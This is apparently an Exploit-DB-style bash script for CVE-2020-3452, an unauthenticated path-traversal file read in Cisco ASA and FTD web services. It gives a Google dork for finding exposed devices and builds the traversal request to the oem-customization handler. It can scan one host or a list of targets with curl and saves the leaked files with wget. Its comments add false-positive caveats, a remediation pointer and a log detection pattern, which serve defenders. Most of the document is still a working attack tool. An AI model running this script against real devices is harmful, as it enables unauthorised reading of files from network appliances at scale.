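#!/bin/bash
# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
# Google Dork: inurl:/+CSCOE+/
# Date: 2020-08-27
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
# Vulnerability Type: unauthenticated file read
# CVE: CVE-2020-3452
#
# Purpose:
#   Checks whether the web-services interface of an ASA/FTD device answers an
#   unauthenticated request to the oem-customization handler with file content.
#   The title calls this a local file inclusion; the vendor advisory linked
#   above classifies CVE-2020-3452 as a read-only path traversal in web services.
#
# Usage:
#   script -i <base-url>            check a single device
#   script -l <targets.txt>         check every base URL listed in the file
#   script ... -r <resource>        resource to request (default below)
#   Targets are presumably full base URLs such as https://<host>: the output
#   file name is taken from the characters after the first eight.
#
# Result handling:
#   - HTTP 400 on the HEAD probe is reported as "doesn't exist".
#   - Otherwise the resource is downloaded to <name>.txt in the current
#     directory; a non-empty file is reported as vulnerable. The body is not
#     inspected, so any non-empty 2xx response (for example an HTML page from
#     an unrelated server) also counts. Review the saved file to confirm.
#   - <name> is a fixed-width slice of the target, so targets sharing that
#     prefix overwrite each other's output file.
#
# Remediation and detection:
#   Fixed releases are listed in the vendor advisory linked above. On the
#   defensive side, the observable pattern is a request for
#   /+CSCOT+/oem-customization carrying "platform=.." and "resource-type=.."
#   in HTTP logs or IDS telemetry in front of the device.

set -u

# Resource requested through the "name" query parameter (override with -r).
resource="%2bCSCOE%2b/portal_inc.lua"
input=""
website=""

# Path and query prefix appended to every target; the resource name follows it.
readonly QUERY='/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name='

#######################################
# Print usage and exit with status 1.
#######################################
helpFunction() {
  echo ""
  echo -e "\t\tCVE-2020-3452"
  echo ""
  echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
  echo -e "\t-l for list of IPs in text file"
  echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
  echo -e "\t-i for single IP test"
  exit 1
}

#######################################
# Probe one target and report the result on stdout.
# Globals:   QUERY (read), resource (read)
# Arguments: $1 - target base URL
#            $2 - number of characters (after the first eight) used for the
#                 output file name: 11 in list mode, 8 in single mode, matching
#                 the original cut -c9-19 / cut -c9-16
# Outputs:   status messages; writes <name>.txt when a body is returned
#######################################
check_target() {
  local target=$1
  local name_len=$2
  local url="${target}${QUERY}${resource}"
  local name filename status

  # The name comes from caller-supplied text (possibly a targets file), so
  # anything that could act as a path separator, glob or whitespace is
  # replaced before it is used as a file name.
  name=${target:8:$name_len}
  name=${name//[^A-Za-z0-9._:-]/_}
  filename="${name}.txt"

  # HEAD request, following redirects; only the numeric status is kept.
  # --url keeps a target that starts with '-' from being parsed as an option.
  status=$(curl -LI -s -o /dev/null -w '%{http_code}\n' --url "$url")

  # String comparison: the original single-target branch compared the numeric
  # code against the text "Bad Request" with -eq, which never matched.
  if [[ "$status" == "400" ]]; then
    echo "$url doesn't exist!"
    return
  fi

  # wget -O creates the output file even when the request fails, so an empty
  # file is treated as "nothing returned".
  wget -O "$filename" -- "$url"
  if [[ -s "$filename" ]]; then
    echo "$url exists, reading ${resource}..."
    echo "downloaded!, $target is vulnerable to CVE-2020-3452."
  else
    echo "not vulnerable!"
    rm -f -- "$filename"
  fi
}

while getopts "l:r:i:" opt; do
  case "$opt" in
    l) input="$OPTARG" ;;
    r) resource="$OPTARG" ;;
    i) website="$OPTARG" ;;
    *) helpFunction ;;
  esac
done

# At least one of -i / -l is required.
if [[ -z "$website" && -z "$input" ]]; then
  echo "Some/all of the parameters are empty"
  helpFunction
fi

if [[ -z "$website" ]]; then
  if [[ ! -r "$input" ]]; then
    echo "cannot read target list: $input" >&2
    exit 1
  fi
  # One target per line; blank lines are skipped and a final line without a
  # trailing newline is still processed.
  while IFS= read -r line || [[ -n "$line" ]]; do
    [[ -n "$line" ]] || continue
    check_target "$line" 11
  done < "$input"
else
  check_target "$website" 8
fi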